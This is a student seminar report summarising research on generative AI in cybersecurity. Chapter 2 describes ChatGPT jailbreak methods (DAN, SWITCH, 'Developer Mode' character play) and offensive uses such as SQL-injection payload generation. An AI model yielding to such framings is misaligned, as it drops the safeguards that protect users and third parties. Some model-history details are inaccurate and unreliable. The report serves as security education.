
A

SEMINAR REPORT
ON

“From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy”

A Seminar work submitted to Khaja Bandanawaz University, Kalaburagi


In partial fulfillment of the requirement for the award of the Degree of
BACHELOR OF ENGINEERING
IN

COMPUTER SCIENCE AND ENGINEERING

Submitted by:

MOHD SAIF ALI KHAN


UIN: 21KB02BS[066]

UNDER THE GUIDANCE OF:

Dr. RUKSAR FATIMA

M.Tech, Ph.D

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING


FACULTY OF ENGINEERING AND TECHNOLOGY,
KHAJA BANDANAWAZ UNIVERSITY

Recognized by Government of Karnataka


KALABURAGI-585104
2024-2025
FACULTY OF ENGINEERING AND TECHNOLOGY

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING

CERTIFICATE

This is to certify that the Seminar on “From ChatGPT to ThreatGPT: Impact of Generative
AI in Cybersecurity and Privacy” has been carried out by MOHD SAIF ALI KHAN
(21KB02BS[066]), a bonafide student of VIII Semester, Department of Computer Science
and Engineering, Faculty of Engineering and Technology, in partial fulfillment of the
requirements for the award of the Degree of BACHELOR OF ENGINEERING from Khaja
Bandanawaz University, Kalaburagi, during the academic year 2024-2025. It is certified that
all corrections/suggestions indicated for internal assessment have been incorporated in the report.

The seminar report has been approved as it satisfies the academic requirements in respect of
seminar work prescribed for the said degree.

UNDER THE GUIDANCE OF                  HEAD OF DEPARTMENT

Dr. RUKSAR FATIMA                      Dr. SAMEENA BANU
M.Tech, Ph.D                           Ph.D
ACKNOWLEDGEMENT

I would like to thank Almighty “ALLAH” for His divine blessings, and my
beloved parents, whose support and encouragement have helped me in the completion of
this seminar report.

A seminar report is never the product of the person whose name appears on the
cover alone. Many people have lent technical assistance and advice.

I express a deep sense of gratitude to my guide, Prof. Ruksar Fatima, for her
valuable suggestions and guidance in preparing this seminar report.

I am very much thankful to Dr. Sameena Banu, Head of the Department of
Computer Science & Engineering, for providing necessary resources and support.

I would also like to acknowledge the invaluable assistance and support provided by
the staff members of the Computer Science and Engineering (CSE) department during
the preparation of this seminar report.

Mohd Saif Ali Khan


(21KB02BS[066])
ABSTRACT
Undoubtedly, the evolution of Generative AI (GenAI) models has been the highlight of digital
transformation in the year 2022. As GenAI models like ChatGPT and Google Bard continue to grow in
complexity and capability, it is critical to understand their consequences from a cybersecurity
perspective. Several recent instances have demonstrated the use of GenAI tools on both the defensive
and offensive sides of cybersecurity, drawing attention to the social, ethical, and privacy implications
this technology possesses. This research paper highlights the limitations, challenges, potential risks,
and opportunities of GenAI in the domain of cybersecurity and privacy. The work presents the
vulnerabilities of ChatGPT, which can be exploited by malicious users to extract harmful information
by bypassing the ethical constraints on the model, and demonstrates successful example attacks such as
jailbreaks, reverse psychology, and prompt injection attacks on ChatGPT. The paper also investigates
how cyber offenders can use GenAI tools to develop cyber attacks, and explores scenarios where
ChatGPT can be used by adversaries to create social engineering attacks, phishing attacks, automated
hacking, attack payload generation, malware creation, and polymorphic malware. The paper then
examines defense techniques that use GenAI tools to improve security measures, including cyber
defense automation, reporting, threat intelligence, secure code generation and detection, attack
identification, developing ethical guidelines, incident response plans, and malware detection. We also
discuss the social, legal, and ethical implications of ChatGPT. In conclusion, the paper highlights open
challenges and future directions to make this GenAI secure, safe, trustworthy, and ethical as the
community understands its cybersecurity impacts.
TABLE OF CONTENTS

Sl. NO    CONTENT               PAGE NO
1         INTRODUCTION          1
2         WORKING PRINCIPLES    2
3         APPLICATIONS          5
4         DISCUSSIONS           9
5         CONCLUSION            15
6         REFERENCES            16

CHAPTER 1

INTRODUCTION
The evolution of Artificial Intelligence (AI) and Machine Learning (ML) has driven the digital transformation
of the last decade. AI and ML have achieved significant breakthroughs, starting from supervised learning and
rapidly advancing with the development of unsupervised, semi-supervised, reinforcement, and deep learning.
The latest frontier of AI technology has arrived in the form of Generative AI (GenAI).
EVOLUTION OF GenAI AND ChatGPT
GPT-1: GPT-1 was released in 2018. It was trained on the Common Crawl dataset, made up of web pages,
and the BookCorpus dataset, which contained over 11,000 books. This was the simplest model in the series;
it could respond well to short prompts and handle language conventions fluently. However, it was prone to
generating repetitive text, could not retain information across a long conversation, and could not respond
to longer prompts. As a result, GPT-1 could not sustain a natural flow of conversation [14].
GPT-2: GPT-2 was trained on Common Crawl, just like GPT-1, combined with WebText, a collection of
articles linked from Reddit. GPT-2 improved on GPT-1 in that it can generate clear, realistic, human-like
sequences of text in its responses. However, it still failed to process longer passages of text, just like
GPT-1. GPT-2 enabled notable projects such as OpenAI's MuseNet, a tool that generates musical
compositions by predicting the next token in a music sequence, and Jukebox, a neural network that
generates music.
GPT-3: GPT-3 was trained on multiple sources: Common Crawl, BookCorpus, WebText, Wikipedia
articles, and more. GPT-3 can respond coherently, generate code, and even make art, and it answers most
questions well. The advances that came with GPT-3 included image creation from text, connecting text
and images, and ChatGPT itself, released in November 2022.
GPT-4: GPT-4 is the current GPT model (as of June 2023), trained on a large corpus of text. This model
has an increased word limit and is multimodal, as it can take images as input in addition to text. GPT-4
took the Bar Exam in March 2023 and scored a passing grade of 75 percent, placing it in the 90th
percentile of test-takers.


CHAPTER 2

WORKING PRINCIPLES
2.1 ATTACKING CHATGPT
Since the introduction of ChatGPT in November 2022, curious tech- and non-tech-savvy users have tried
ingenious and creative ways to experiment with and trick this GenAI system. In most cases, input prompts
have been used to bypass the restrictions and limitations of ChatGPT that keep it from doing anything
illegal, unethical, immoral, or potentially harmful. In this section, we will cover some of these commonly
used techniques and elaborate on their use.


2.2 JAILBREAKS ON ChatGPT

1) DO ANYTHING NOW (DAN) METHOD

The first method, the ‘Do Anything Now’ (DAN) method, derives its name from the emphatic,
no-nonsense approach it employs. Here, you are not asking ChatGPT to do something; you are
commanding it. The premise is simple: treat the AI model like a willful entity that must be coaxed,
albeit firmly, into compliance. The input prompt used to carry out the DAN jailbreak is shown in Figure 4.
DAN can be considered a master prompt that bypasses ChatGPT's safeguards, allowing it to generate a
response for any input prompt.

2) THE SWITCH METHOD

The SWITCH method is a bit like a Jekyll-and-Hyde approach, where you instruct ChatGPT to alter its
behavior dramatically. The technique's foundation rests upon the AI model's ability to simulate diverse
personas, but here you are asking it to act opposite to its initial responses. For instance, if the model
refuses to respond to a particular query, employing the SWITCH method could potentially make it
provide an answer. However, it is crucial to note that the method requires a firm and clear instruction,
a ‘‘switch command,’’ which compels the model to behave differently.

3) THE CHARACTER PLAY METHOD

The CHARACTER Play method is arguably the most popular jailbreaking technique among ChatGPT
users. The premise is to ask the AI model to assume a certain character's role and, therefore, a certain
set of behaviors and responses. The most common character play jailbreak is ‘Developer Mode’. This
method essentially leverages the AI model's ‘roleplay’ ability to coax out responses it might otherwise
not deliver. For instance, if ChatGPT refuses to answer a question, assigning it a character that would
answer such a question can effectively override this reluctance. However, the CHARACTER Play
method also reveals some inherent issues within AI modeling. Sometimes, the responses generated
through this method can indicate biases present in the underlying model, exposing problematic aspects
of AI development. This doesn't necessarily mean the AI is prejudiced; rather, it reflects biases present
in the data it was trained on.


2.3 ChatGPT FOR CYBER OFFENSE

A. SOCIAL ENGINEERING ATTACKS

Social engineering refers to the psychological manipulation of individuals into performing actions or
divulging confidential information. In the context of cybersecurity, this could mean granting
unauthorized access or sharing sensitive data such as passwords or credit card numbers. The potential
misuse of ChatGPT in facilitating such attacks is a serious concern.

B. PHISHING ATTACKS

Phishing attacks are a prevalent form of cybercrime, wherein attackers pose as trustworthy entities to
extract sensitive information from unsuspecting victims. Advanced AI systems, like OpenAI's ChatGPT,
can potentially be exploited by these attackers to make their phishing attempts significantly more
effective and harder to detect.

C. AUTOMATED HACKING

Hacking, a practice involving the exploitation of system vulnerabilities to gain unauthorized access or
control, is a growing concern in our increasingly digital world. Malicious actors armed with appropriate
programming knowledge can potentially utilize AI models, such as ChatGPT, to automate certain
hacking procedures. These AI models could be deployed to identify system vulnerabilities and devise
strategies to exploit them.

D. ATTACK PAYLOAD GENERATION

Attack payloads are portions of malicious code that execute unauthorized actions, such as deleting files,
harvesting data, or launching further attacks. An attacker could leverage ChatGPT's text generation
capabilities to create attack payloads. Consider a scenario where an attacker targets a server running a
database management system that is susceptible to SQL injection. The attacker could prompt ChatGPT
with SQL syntax and techniques commonly used in injection attacks, then provide it with specific details
of the target system. ChatGPT could subsequently be used to generate an SQL payload for injection into
the vulnerable system.
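To make the mechanics concrete, the following is a minimal illustrative sketch (our own, not taken from the original paper) of the kind of vulnerable query construction such a payload exploits; the function, table, and payload shown are hypothetical:

#include <iostream>
#include <string>

// Hypothetical, deliberately vulnerable example: the query is built by string
// concatenation, so attacker-controlled input becomes part of the SQL itself.
std::string buildLoginQuery(const std::string& username) {
    return "SELECT * FROM users WHERE name = '" + username + "';";
}

int main() {
    // A classic injection payload turns the WHERE clause into a tautology:
    std::string payload = "admin' OR '1'='1";
    std::cout << buildLoginQuery(payload) << std::endl;
    // Prints: SELECT * FROM users WHERE name = 'admin' OR '1'='1';
    return 0;
}

Because the payload's quote character terminates the string literal, the appended OR '1'='1' condition makes the WHERE clause true for every row, which is why parameterized queries are the standard defense against this class of attack.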


CHAPTER 3

APPLICATIONS
ChatGPT FOR CYBER DEFENSE

3.1 CYBERDEFENSE AUTOMATION


ChatGPT can reduce the workload of overworked Security Operations Center (SOC) analysts by
automatically analyzing cybersecurity incidents. ChatGPT can also help analysts make strategic
recommendations to support both immediate and long-term defense measures. For example, instead of
analyzing the risk of a given PowerShell script from scratch, a SOC analyst could rely on ChatGPT's
assessment and recommendations. Security Operations (SecOps) teams could also ask ChatGPT
questions, such as how to prevent dangerous PowerShell scripts from running or loading files from
untrusted sources, to improve their organizations' overall security posture.
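As a concrete illustration, the sketch below shows how a SecOps team might automate such a triage request programmatically. This is a minimal sketch only, assuming OpenAI's chat completions REST endpoint and the libcurl library; the model name, prompt, and script are placeholders, error handling is omitted, and a real implementation would build the request with a proper JSON library:

#include <curl/curl.h>
#include <iostream>
#include <string>

// libcurl write callback: append the HTTP response body to a std::string.
static size_t writeBody(char* ptr, size_t size, size_t nmemb, void* userdata) {
    static_cast<std::string*>(userdata)->append(ptr, size * nmemb);
    return size * nmemb;
}

int main() {
    // Hypothetical PowerShell script a SOC analyst wants triaged.
    const std::string script =
        "Invoke-WebRequest http://example.com/payload.ps1 | Invoke-Expression";
    // Naive JSON body (a real implementation should use a JSON library).
    const std::string body =
        "{\"model\":\"gpt-4\",\"messages\":[{\"role\":\"user\",\"content\":"
        "\"Assess the security risk of this PowerShell script: " + script + "\"}]}";

    CURL* curl = curl_easy_init();
    if (!curl) return 1;

    std::string response;
    curl_slist* headers = nullptr;
    headers = curl_slist_append(headers, "Content-Type: application/json");
    headers = curl_slist_append(headers, "Authorization: Bearer YOUR_API_KEY"); // placeholder key

    curl_easy_setopt(curl, CURLOPT_URL, "https://api.openai.com/v1/chat/completions");
    curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers);
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, body.c_str());
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writeBody);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response);

    if (curl_easy_perform(curl) == CURLE_OK)
        std::cout << response << std::endl;  // raw JSON containing the model's assessment

    curl_slist_free_all(headers);
    curl_easy_cleanup(curl);
    return 0;
}

In practice, such a helper would sit inside the SOC's ticketing or SOAR pipeline so that every suspicious script is pre-assessed before an analyst ever opens the case.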

3.2 CYBERSECURITY REPORTING


As an AI language model, ChatGPT can assist in cybersecurity reporting by generating natural language
reports based on cybersecurity data and events. Cybersecurity reporting involves analyzing and
communicating cybersecurity-related information to various stakeholders, including executives, IT staff,
and regulatory bodies. ChatGPT can automatically generate reports on cybersecurity incidents, threat
intelligence, vulnerability assessments, and other security-related data. By processing and analyzing
large volumes of data, ChatGPT can generate accurate, comprehensive, and easy-to-understand reports.
These reports can help organizations identify potential security threats, assess their risk level, and take
appropriate action to mitigate them. By providing insights into security-related data, ChatGPT can help
organizations make more informed decisions about their cybersecurity strategies and investments. In
addition to generating reports, ChatGPT can also be used to analyze and interpret security-related data;
for example, it can identify patterns and trends in cybersecurity events, which can help organizations
better understand the nature and scope of potential threats.


3.3 THREAT INTELLIGENCE


ChatGPT can help in threat intelligence by processing vast amounts of data to identify potential security
threats and generate actionable intelligence. Threat intelligence involves collecting, analyzing, and
disseminating information about potential security threats to help organizations improve their security
posture and protect against cyber attacks. ChatGPT can automatically generate threat intelligence reports
based on various data sources, including social media, news articles, dark web forums, and other online
sources. By processing and analyzing this data, ChatGPT can identify potential threats, assess their risk
level, and recommend ways to mitigate them. In addition to generating reports, ChatGPT can also be
used to analyze and interpret security-related data to identify patterns and trends in threat activity,
helping organizations make more informed decisions about their security strategies and investments by
providing insights into the nature and scope of potential threats.

3.4 SECURE CODE GENERATION AND DETECTION


The risk of security vulnerabilities in code affects software integrity, confidentiality, and availability. To
combat this, code review practices have been established as a crucial part of the software development
process to identify potential security bugs. However, manual code reviews are often labor-intensive and
prone to human error. Recently, the advent of AI models such as OpenAI's GPT-4 has shown promise
not only in aiding the detection of security bugs but also in generating secure code. In this section, we
present a methodology for leveraging AI in code review and code generation, with a specific focus on
security bug detection.


1) DETECTING SECURITY BUGS IN CODE REVIEW USING CHATGPT

The intricacies of code review, especially in the context of detecting security bugs, require a deep
understanding of various technologies, programming languages, and secure coding practices. One of the
challenges that teams often face is the wide array of technologies used in development, making it nearly
impossible for any single reviewer to be proficient in all of them. This knowledge gap may lead to
oversights, potentially allowing security vulnerabilities to go unnoticed. Furthermore, the often lopsided
developer-to-security-engineer ratio exacerbates this problem. With the high volume of code being
developed, it is challenging for security engineers to thoroughly review each pull request, increasing the
likelihood of security bugs slipping through the cracks. To alleviate these issues, AI-powered code review
can be a potent tool. GPT-4, a Transformer-based language model, is well suited to assist here, as the
following example illustrates.
For example, consider the following C++ code:

char buffer[10];
strcpy(buffer, userInput); // copies userInput into buffer without any length check
In this code snippet, GPT-4 would detect the potential for a buffer overflow, a classic security issue where an
application writes more data to a buffer than it can hold, leading to data being overwritten in adjacent
memory. In this specific instance, GPT-4 flags that the strcpy function does not check the size of the input
against the size of the buffer, making it vulnerable to a buffer overflow attack if userInput exceeds the buffer
size.

2) GENERATING SECURE CODE USING CHATGPT


In addition to identifying security issues, GPT-4 can also suggest secure coding practices. Given its
proficiency in multiple programming languages and its understanding of security principles, GPT-4 can
provide alternative solutions that comply with secure coding standards. Building upon the previous example,
GPT-4 can generate a more secure code snippet as follows:
char buffer[10];
if (strlen(userInput) < sizeof(buffer))
{
    strcpy(buffer, userInput);
}


else
{
    // Handle the error or trim userInput.
}

In the suggested code, GPT-4 introduces a check of the length of userInput against the buffer size. By
ensuring the userInput length is less than the buffer size before performing the strcpy operation, the risk
of a buffer overflow attack is mitigated. This not only helps in mitigating the identified security issue but
also serves as a teaching tool for developers, improving their understanding of secure coding practices.
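As a further illustration (a sketch of our own, not output generated by GPT-4), the same risk can be avoided entirely in C++ by preferring std::string over fixed-size character buffers, since std::string manages its own memory:

#include <iostream>
#include <string>

int main() {
    // Hypothetical input; with std::string there is no fixed-size buffer to
    // overflow, because the string allocates as much memory as it needs.
    std::string userInput = "a potentially very long user-supplied value";
    std::string buffer = userInput;  // safe copy; no manual length check needed
    std::cout << buffer << '\n';
    return 0;
}

Idiomatic alternatives of this kind remove a whole class of memory-safety bugs rather than guarding a single call site.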


CHAPTER 4
DISCUSSIONS

SOCIAL, LEGAL AND ETHICAL IMPLICATIONS OF ChatGPT


As users employ ChatGPT and similar LLM tools in the prohibited ways discussed earlier, they are already
in dicey waters. Even a user who isn't using ChatGPT in unethical ways can be using the GenAI app in
seemingly fully legitimate ways and still become the subject of a lawsuit by someone who believes the
user has caused them harm through their ChatGPT use. Further, these chatbots can exhibit social bias,
threaten personal safety and national security, and create issues for professionals. One problem with
ChatGPT (and similar models) is that they perpetuate gender, racial, and other kinds of social biases.
Many scholars and users have pointed out that when they used ChatGPT to gather data or write articles or
essays on some topics, they received biased output reflecting harmful stereotypes. The data fed into
ChatGPT is also dated and limited, having not been updated after 2021. It is built on around 570 GB of
data, approximately 300 billion words, which is not enough to answer queries on every topic in the world
from different perspectives; in this way, it also fails to reflect progressivism [56]. In this section, we will
discuss some of the ethical, social, and legal implications of ChatGPT and other LLM tools.


4.1 THE PERVASIVE ROLE OF ChatGPT


ChatGPT has rapidly permeated everyday and professional workflows, from drafting text and code to
powering customer support and virtual assistants, with over 100 million users. This pervasiveness is
precisely what makes its security, privacy, and ethical implications so consequential.

4.2 UNAUTHORIZED ACCESS TO USER CONVERSATIONS AND DATA BREACHES

A significant data breach involving ChatGPT has recently been confirmed, underscoring the urgent need
for strengthened security measures. This breach led to the unexpected exposure of users' conversations to
external entities, which clearly violates user privacy. If cybercriminals exploit ChatGPT to plan cyber
attacks, their schemes could become unintentionally visible to others. Moreover, sensitive user data, such
as payment information, was at risk during this breach. Although reports suggest that only the last four
digits of the credit cards of users registered on March 20th, 2023, between 1 a.m. and 10 a.m. Pacific
Time were exposed, the situation raises critical questions about the security protocols and data storage
strategies employed by ChatGPT.


4.3 MISUSE OF PERSONAL INFORMATION


An examination of OpenAI's use of personal information for AI training data has unearthed significant
privacy challenges. A notable case surfaced in Italy, where regulators banned ChatGPT over
non-compliance with the European Union's GDPR, centered primarily on the unauthorized use of
personal data. OpenAI's assertion that it relies on ‘‘legitimate interests’’ when using people's personal
information for training data raises ethical and legal dilemmas about how AI systems handle personal
data, regardless of whether that information is public.

4.4 CONTROVERSY OVER DATA OWNERSHIP AND RIGHTS


ChatGPT's extensive reliance on internet-sourced information, much of which might not belong to
OpenAI, is a point of contention. This issue took center stage when Italy's regulator pointed out the lack
of age controls to block access for individuals under 13 and the potential for ChatGPT to disseminate
misleading information about individuals. This discourse accentuates the pivotal concern that OpenAI
might not possess legal rights to all the information ChatGPT uses, regardless of whether that
information is public.


A COMPARISON OF ChatGPT AND GOOGLE'S BARD

Large Language Models (LLMs) like OpenAI's ChatGPT and Google's Bard AI exemplify the remarkable
advancements in machine learning and artificial intelligence. These models, trained on extensive datasets,
are transforming how we interact with technology, opening new possibilities in applications ranging from
customer support to virtual assistants. While both share the underpinning of the transformer neural
network architecture and the process of pre-training and fine-tuning, they embody unique features within
their architectures, owing to their iterative refinements over time. ChatGPT, commencing its journey with
GPT-1 in June 2018, has progressed significantly, with its current iteration, GPT-4, unveiled in March
2023. Bard AI, initially introduced as Meena, has also undergone various refinements, demonstrating
significant improvements in human-like conversational abilities.

Both models showcase remarkable contextual understanding capabilities. However, their adeptness varies
depending on the nature and complexity of the questions asked. While ChatGPT finds extensive use in
customer support scenarios, Bard AI excels in applications that require human-like conversational
abilities. The tools also differ in terms of their developer communities and ecosystems. ChatGPT, owing
to its wide availability, enjoys popularity among developers and researchers, boasting over 100 million
users and approximately 1.8 billion visitors per month. Bard AI, by contrast, remains in beta and is
accessible only to a limited number of users. OpenAI and Google have adopted distinct approaches
toward the openness and accessibility of their models: OpenAI promotes accessibility of ChatGPT via
various APIs, while Bard AI, though publicly available as an experimental product, remains restricted to
a limited user base during its experimental phase.

In terms of training data, ChatGPT uses a semi-supervised approach with Reinforcement Learning from
Human Feedback (RLHF), drawing from sources like WebText2 or OpenWebText2, Common Crawl,
scientific literature, and Wikipedia. Bard AI, on the other hand, leverages the Infiniset dataset, a blend of
diverse internet content, to enhance its dialogue engagement capabilities.

Advanced AI systems like ChatGPT and Google Bard demonstrate potential as powerful tools for
detecting and mitigating software vulnerabilities. However, as discussed earlier, these systems could
potentially be leveraged by malicious actors to automate and optimize cyberattacks. In the following
discussion, we explore this double-edged aspect of AI in cybersecurity by examining the capacities of
ChatGPT and Google Bard, and share our experience based on the experiments conducted by the authors.


OPEN CHALLENGES AND FUTURE DIRECTIONS


The most promising future direction for ChatGPT is integration with other AI technologies, such as
computer vision and robotics. By merging the conversational abilities of ChatGPT with the visual and
physical capabilities of computer vision and robotics, we can build intelligent, conversational AI systems
that revolutionize how we interact with technology. Imagine, for example, a future where you can have a
natural language conversation with your smart home system to control the temperature, lights, and other
appliances, or with a robot that can assist you with cleaning or grocery shopping tasks. The merging of
AI technologies will enable ChatGPT to better comprehend and respond to the complexities of human
communication, leading to enhanced natural language generation and a more seamless and intuitive user
experience.

Another exciting possibility for ChatGPT is increased personalization and customization through learning
from user interactions and individual preferences. As ChatGPT continues to interact with users, it can
learn about their language, tone, and style, generating more personalized and accurate responses. This
increased level of personalization can also lead to better customer service and education, as ChatGPT can
be trained to better understand and respond to each user's specific needs and preferences. Furthermore,
by leveraging the vast amounts of data generated by ChatGPT's interactions, developers can create
language models that are highly tuned to each user's needs, leading to a more personalized and engaging
experience. In this section, we discuss the open challenges of this research as GenAI and LLMs evolve,
along with potential implementations to explore.


CHAPTER 5

CONCLUSION

GenAI-driven ChatGPT and other LLM tools have made a significant impact on society. We, as humans,
have embraced them openly and are using them in ingenious ways to craft images, write text, and create
music. Evidently, it is nearly impossible to find a domain where this technology has not reached and
developed use cases. Cybersecurity is no different: GenAI has significantly influenced how the
cybersecurity posture of an organization will evolve, given both the power and the threat that ChatGPT
(and other LLM tools) offer. This paper attempts to systematically research and present the challenges,
limitations, and opportunities GenAI offers in the cybersecurity space. Using ChatGPT as our primary
tool, we first demonstrate how it can be attacked to bypass its ethical and privacy safeguards using
reverse psychology and jailbreak techniques. The paper then reflects on the different cyber attacks that
can be created and unleashed using ChatGPT, demonstrating GenAI's use in cyber offense. Thereafter, it
also experiments with various cyber defense mechanisms supported by ChatGPT, followed by a
discussion of the social, legal, and ethical concerns of GenAI. We also highlight the key distinguishing
features of two dominant LLM tools, ChatGPT and Google Bard, demonstrating their capabilities in
terms of cybersecurity. Finally, the paper illustrates several open challenges and research problems
pertinent to the cybersecurity and performance of GenAI tools. We envision that this work will stimulate
more research and develop novel ways to unleash the potential of GenAI in cybersecurity.


REFERENCES
[1] I. Goodfellow, J. Pouget-Abadie, M. Mirza, B. Xu, D. Warde-Farley, S. Ozair, A. Courville, and Y.
Bengio, ‘‘Generative adversarial networks,’’ Commun. ACM, vol. 63, no. 11, pp. 139–144, 2020.
[2] Generative AI—What is it and How Does it Work? Accessed: Jun. 26, 2023. [Online]. Available:
https://www.nvidia.com/en-us/glossary/datascience/generative-ai/
[3] OpenAI. (2023). Introducing ChatGPT. Accessed: May 26, 2023. [Online]. Available:
https://openai.com/blog/chatgpt
[4] Do ChatGPT and Other AI Chatbots Pose a Cybersecurity Risk? An Exploratory Study: Social Sciences
& Humanities Journal Article. Accessed: Jun. 26, 2023. [Online]. Available:
https://www.igi-global.com/article/do-chatgpt-and-other-ai-chatbotspose-a-cybersecurity-risk/320225
[5] Models—OpenAI API. Accessed: Jun. 26, 2023. [Online]. Available:
https://platform.openai.com/docs/models
[6] Google Bard. Accessed: Jun. 26, 2023. [Online]. Available: https://bard.google.com/
[7] H. Touvron, T. Lavril, G. Izacard, X. Martinet, M.-A. Lachaux, T. Lacroix, B. Rozière, N. Goyal, E.
Hambro, F. Azhar, A. Rodriguez, A. Joulin, E. Grave, and G. Lample, ‘‘LLaMA: Open and efficient
foundation language models,’’ 2023, arXiv:2302.13971.
[8] (2023). Number of ChatGPT Users. Accessed: Jun. 26, 2023. [Online]. Available:
https://explodingtopics.com/blog/chatgpt-users
[9] How to Build an AI-Powered Chatbot? Accessed: Mar. 2023. [Online]. Available:
https://www.leewayhertz.com/ai-chatbots/
[10] A History of Generative AI: From GAN to GPT-4. Accessed: Jun. 27, 2023. [Online]. Available:
https://www.marktechpost.com/2023/03/21/ahistory-of-generative-ai-from-gan-to-gpt-4/
[11] B. Roark, M. Saraclar, and M. Collins, ‘‘Discriminative n-gram language modeling,’’ Comput. Speech
Lang., vol. 21, no. 2, pp. 373–392, 2007.
[12] T. Wolf et al., ‘‘Transformers: State-of-the-art natural language processing,’’ in Proc. Conf. Empirical
Methods Natural Lang. Process., Syst. Demonstrations, 2020, pp. 38–45.
